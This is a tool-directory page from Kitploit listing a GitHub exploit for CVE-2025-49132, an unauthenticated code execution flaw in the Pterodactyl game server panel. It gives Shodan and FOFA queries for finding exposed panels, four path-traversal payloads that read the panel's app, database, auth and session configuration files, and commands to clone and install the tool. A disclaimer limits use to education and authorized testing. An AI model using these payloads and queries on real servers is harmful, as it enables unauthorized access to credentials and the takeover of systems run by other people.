Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-49132 | Kitploit
Tools/GitHubGitHub/yurahshell/cve-2025-49132
ReconnaissanceVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubyurahshell/cve-2025-49132

CVE-2025-49132

View Repository
2 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-49132 — Pterodactyl RCE

Exploit tool for CVE-2025-49132 — a critical unauthenticated arbitrary code execution vulnerability affecting the Pterodactyl game server panel.


🧠 What is CVE-2025-49132 ?

A critical ACE flaw in the Pterodactyl panel that allows unauthenticated remote attackers to execute arbitrary code — potentially leading to full system compromise.

No auth needed. Just a vulnerable instance.


⚠️ Disclaimer

For educational and authorized pentesting purposes only.

🔍 Reconnaissance

Shodan

root@kitploit:~
http.title:"Pterodactyl"

FOFA

root@kitploit:~
"Pterodactyl"

💉 Payloads

root@kitploit:~
locales/locale.json?locale=../../../pterodactyl&namespace=config/app
locales/locale.json?locale=../../../pterodactyl&namespace=config/database
locales/locale.json?locale=../../../pterodactyl&namespace=config/auth
locales/locale.json?locale=../../../pterodactyl&namespace=config/session

📦 Installation

root@kitploit:~
git clone https://github.com/yurahshell/CVE-2025-49132
cd CVE-2025-49132
pip install -r requirements.txt

🎯 Affected Software

SoftwareStatus
Pterodactyl Panel

📄 References

  • NVD - CVE-2025-49132
  • Pterodactyl
Download Tool